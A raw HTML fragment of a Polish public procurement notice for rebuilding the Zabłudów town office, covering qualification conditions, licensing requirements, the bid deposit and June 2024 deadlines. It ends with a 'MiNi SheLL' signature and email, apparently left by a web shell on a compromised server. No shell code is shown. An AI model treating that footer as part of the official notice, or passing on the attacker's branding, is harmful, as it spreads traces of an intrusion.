kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia w zakresie Zadania 1 może ubiegać się Wykonawca, który spełnia warunki udziału w postępowaniu, dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa warunku; <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa warunku; <br/>3)	sytuacji ekonomicznej lub finansowej – Zamawiający nie określa warunku;<br/>4) zdolności technicznej lub zawodowej tj.: <br/>Zadanie 1:<br/>A.	Wykonawca winien wykazać, że wykonał:<br/>a)	należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie i prawidłowo ukończył co najmniej jedno zamówienie polegające na budowie lub przebudowie lub rozbudowie obiektu budowlanego (stanowiącego obiekty użyteczności publicznej, biurowe, usługowe, handlowe) o wartości brutto min. 5 000 000,00 zł; <br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie jedno opracowanie dokumentacji projektowej polegające na budowie lub przebudowie lub rozbudowie obiektu budowlanego (stanowiącego obiekty użyteczności publicznej, biurowe, usługowe, handlowe) o wartości brutto min. 50 000,00 zł.<br/>Wykonawca powinien w wykazie robót wyraźnie określić rodzaj obiektu budowlanego, wartość, oraz zakres robót, aby można było ustalić, czy spełnia warunek udziału w postępowaniu.<br/>B.	Wykonawca dysponuje lub będzie dysponować w okresie wykonywania zamówienia osobami skierowanymi do realizacji zamówienia publicznego, posiadającymi uprawnienia do projektowania bez ograniczeń w każdej z poniższych specjalności tj.: <br/>	projektanta w specjalności architektonicznej - pełniący funkcję koordynatora zespołu projektowego: posiadającego uprawnienia do projektowania bez ograniczeń, <br/>	projektanta w specjalności konstrukcyjno – budowlanej: posiadającego uprawnienia do projektowania bez ograniczeń, <br/>	projektanta w specjalności elektrycznej: projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>	projektanta w specjalności sanitarnej: projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>	projektanta w specjalności telekomunikacyjnej: projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, <br/>	projektanta w specjalności drogowej: projektowania bez ograniczeń w specjalności drogowej.<br/>Wykonawca dysponuje lub będzie dysponować w okresie wykonywania zamówienia osobami skierowanymi do realizacji zamówienia publicznego, posiadającymi uprawnienia do kierowania robotami budowlanymi, które posiadają doświadczenie opisane poniżej tj.: <br/>•	kierownika budowy pełniącego funkcję koordynatora zespołu - kierowania robotami budowlanym: posiadającego uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w kierowaniu robotami budowlanymi na stanowisku kierownika budowy obiektów kubaturowych,<br/>•	kierownika robót elektrycznych: posiadającego uprawnienia do kierowania robotami bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>•	kierownika robót sanitarnych: posiadającego uprawnienia do kierowania robotami bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/> • kierownika robót telekomunikacyjnych: posiadającego uprawnienia do kierowania robotami bez ograniczeń w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, <br/>•	kierownika robót drogowych: posiadającego uprawnienia do kierowania robotami drogowymi bez ograniczeń w specjalności drogowej.<br/>Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. 2023r., poz. 682 ze zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania. c) Zgodnie z art. 12 a ustawy Prawo budowlane, samodzielne funkcje techniczne w budownictwie, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych - ustawa z dnia 22 grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2023 roku, poz. 334).<br/>Zamawiający dopuszcza, by Wykonawca dysponował osobą posiadającą więcej niż jedno uprawnienie.<br/>2.	O udzielenie zamówienia w zakresie Zadania 2 może ubiegać się Wykonawca, który spełnia warunki udziału w postępowaniu, dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa warunku; <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa warunku; <br/>3)	sytuacji ekonomicznej lub finansowej – Zamawiający nie określa warunku; <br/>4)	zdolności technicznej lub zawodowej tj.: <br/>a)	Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykonał należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną usługę nadzoru inwestorskiego nad realizacją robót obejmujących w swoim zakresie budowę lub przebudowę lub rozbudowę obiektów budowlanych (stanowiącego obiekt użyteczności publicznej, biurowy, usługowy handlowy) o wartości nie niższej niż 80 000,00 zł brutto.<br/>b)	Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże, że będzie dysponował osobami, które skierował do realizacji zamówienia publicznego, posiadającymi uprawnienia do kierowania robotami budowlanymi bez ograniczeń w każdej z poniższych specjalności, oraz osobą posiadającą uprawnienia do projektowania w poniższej specjalności, tj.: <br/> •	Budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń - pełniący funkcję koordynatora zespołu nadzoru inwestorskiego, <br/>•	budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,<br/>•	budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>•	budowlane w zakresie w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń,<br/>•	drogowe do kierowania robotami drogowymi bez ograniczeń w specjalności drogowej,<br/>•	do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej - pełniącego funkcję nadzoru nad prawidłowością realizacji dokumentacji projektowej.<br/>Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2023r., poz. 682 ze zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania. c) Zgodnie z art. 12 a ustawy Prawo budowlane, samodzielne funkcje techniczne w budownictwie, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych - ustawa z dnia 22 grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2023 roku, poz. 334).<br/>Zamawiający dopuszcza, by Wykonawca dysponował osobą posiadającą więcej niż jedno uprawnienie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania ofert. <br/>W zakresie Zadania 1 wzór oświadczenia stanowi załącznik nr 4 do SWZ. W zakresie Zadania 2 wzór oświadczenia stanowi Załącznik Nr 5 do SWZ. <br/>Oświadczenie takie składa każdy z Wykonawców składających ofertę wspólnie oraz podmiot udostępniający potencjał, na którego zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej polega Wykonawca. <br/>2.	Na potwierdzenie braku podstaw wykluczenia i spełniania warunków udziału w postępowaniu, Zamawiający wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych. <br/>3.	Wykonawca, którego oferta została oceniona najwyżej, w celu potwierdzenia braku podstaw wykluczenia, o których mowa w art. 108 ust. 1 pkt 1-6 oraz w art. 109 ust. 1 pkt 8 i 10 ustawy i art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835), na wezwanie Zamawiającego, składa oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. <br/>W zakresie Zadania 1 wzór oświadczenia Wykonawcy o aktualności informacji stanowi załącznik nr 6 do SWZ. W zakresie Zadania 2 wzór oświadczenia Wykonawcy o aktualności informacji stanowi załącznik nr 7 do SWZ. <br/>Wykonawca, którego oferta została oceniona najwyżej, w celu potwierdzenia braku podstaw wykluczenia, o których mowa w art. 108 ust. 1 pkt 1-6 oraz w art. 109 ust. 1 pkt 8 i 10 ustawy i art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129, z późn. zm.), dotyczących podmiotu, na którego zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej polega Wykonawca, na wezwanie Zamawiającego, składa oświadczenie, o którym mowa wyżej, w niniejszym ustępie, tego podmiotu. <br/>10.	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający może żądać od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W zakresie Zadania 1:<br/>1)	wykaz usług -zawierający co najmniej jedną usługę zaprojektowania polegającego na budowie lub przebudowie lub rozbudowie obiektu budowlanego (stanowiącego obiekty użyteczności publicznej, biurowe, usługowe, handlowe) o wartości brutto min. 50 000,00 zł, wykonaną nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert. <br/>2)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, posiadających uprawnienia do projektowania bez ograniczeń w każdej z poniższych specjalności, tj.: <br/>-	projektanta z uprawnieniami do projektowania w specjalności architektonicznej, <br/>-	projektanta z uprawnieniami do projektowania w specjalności konstrukcyjno-budowlanej, <br/>-	projektanta z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>-	projektanta z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>-	projektanta z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, <br/>-	projektanta z uprawnieniami do projektowania w specjalności drogowej - wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 9 do SWZ; <br/>3)	wykaz robót budowlanych zawierający co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie lub rozbudowie obiektu budowlanego (stanowiącego obiekty użyteczności publicznej, biurowe, usługowe, handlowe) o wartości brutto min. 5 000 000,00 zł, wykonaną nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert. <br/>4)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, posiadających uprawnienia do kierowania robotami budowlanymi bez ograniczeń w każdej z poniższych specjalności, tj.: <br/>- konstrukcyjno-budowlanej – pełniącego funkcję koordynatora zespołu kierowania robotami budowlanym: <br/>-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych ,<br/>-	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>-	w specjalności drogowej- wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia oraz informacją o podstawie dysponowania tymi osobami. <br/>2. W zakresie Zadania 2 : <br/>1)	wykaz zawierający co najmniej jedną usługę nadzoru inwestorskiego nad realizacją robót obejmujących w swoim zakresie budowę lub przebudowę lub rozbudowę obiektów budowlanych (stanowiącego obiekt użyteczności publicznej, biurowy, usługowy handlowy) o wartości nie niższej niż 80 000,00 zł brutto nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, . Wzór wykazu stanowi załącznik nr 12 do SWZ; <br/>2)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, posiadających uprawnienia do kierowania robotami budowlanymi w każdej z poniższych specjalności posiadających uprawnienia do projektowania w poniższej specjalności, tj.: <br/>-	konstrukcyjno-budowlanej – pełniący funkcję koordynatora zespołu nadzoru inwestorskiego; <br/>-	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych ,<br/>-	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>-	instalacyjnej w zakresie w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, <br/>-	w specjalności drogowej;<br/>-	do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej – pełniącego funkcję nadzoru nad prawidłowością realizacji dokumentacji projektowej, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium. <br/>2.	Kwota wadium: <br/>Zadanie 1 – 130 000,00 PLN (słownie: sto trzydzieści tysięcy złotych), <br/>Zadanie 2 –1 000,00 PLN (słownie: jeden tysiąc złotych). <br/>3.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy. <br/>4.	Wadium może być wniesione w formach określonych w art. 97 ust. 7 ustawy. <br/>5.	W przypadku wniesienia wadium w pieniądzu należy dokonać tego przelewem na rachunek bankowy Urzędu Miejskiego w Zabłudowie: Podlasko – Mazurski BS Zabłudów Nr 52 8099 0004 0000 0101 2000 0340, z dopiskiem: „Wadium na Przebudowę i rozbudowę budynku administracyjno - biurowego – Urzędu Miejskiego w Zabłudowie – odpowiednio z dopiskiem Zadanie 1 lub Zadanie 2”. <br/>6.	Wadium wnoszone w pieniądzu musi wpłynąć na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. <br/>7.	Wadium wnoszone w formie poręczenia lub gwarancji powinno być złożone w oryginale, w postaci elektronicznej i musi obejmować cały okres związania ofertą. <br/>8.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej w ich treści winien znajdować się zapis o tym, że jest ona nieodwołalna, bezwarunkowa i płatna na pierwsze żądanie Zamawiającego. Zapłata musi nastąpić niezależnie od ewentualnych zastrzeżeń Wykonawcy. Zamawiającemu powinno przysługiwać prawo dochodzenia należności zabezpieczonych gwarancją bezpośrednio od wystawcy gwarancji. Niedopuszczalne są zapisy uzależniające zapłatę przez gwaranta sumy gwarancyjnej od wcześniejszego żądania zapłaty należności od Wykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia wraz z ofertą należy złożyć pełnomocnictwo udzielone przez Wykonawców do reprezentowania ich w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Oświadczenia lub dokumenty wymienione w SWZ składane są przez Wykonawców wspólnie, z wyjątkiem wymienionych w rozdziale VII ust. 1 i ust. 3, które składane są przez każdego z Wykonawców oddzielnie. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawcy, przed zawarciem umowy w sprawie zamówienia publicznego, przedstawią Zamawiającemu umowę regulującą ich współpracę. <br/>2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. <br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>4.	W przypadku, o którym mowa w ust. 2 i 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <br/>5.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy na warunkach określonych we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">adres strony internetowej do elektronicznego składania ofert: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com